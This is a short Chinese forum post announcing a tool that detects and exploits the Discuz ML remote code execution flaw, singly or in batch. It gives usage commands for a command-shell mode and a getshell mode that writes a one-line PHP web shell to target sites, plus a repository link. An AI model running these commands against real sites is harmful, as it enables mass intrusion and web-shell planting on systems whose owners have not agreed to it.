-
-
[下载]Discuz ML RCE 漏洞批量检测利用工具
-
发表于: 2020-3-28 11:16
-
工具说明本工具支持单url和批量检测,有判断模式(只判断有无该漏洞)、cmdshell模式(返回简单的cmd shell)和getshell模式(写入一句话木马)。
使用时加上漏洞PHP页面如(forum.php,portal.php),直接写域名可能会重定向导致误报。
环境插件
python2.7
pip -r requirements.txt
使用方法
判断模式 python dzml.py -u "https://xx.xx.com/forum.php"
cmdshell模式 python dzml.py -u "https://xx.xx.com/forum.php" --cmdshell
getshell模式 python dzml.py -u "https://xx.xx.com/forum.php" --getshell
批量检测 python dzml.py -f urls.txt
批量getshell python dzml.py -f urls.txt --getshell
下载地址:
https://github.com/theLSA/discuz-ml-rce.git
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
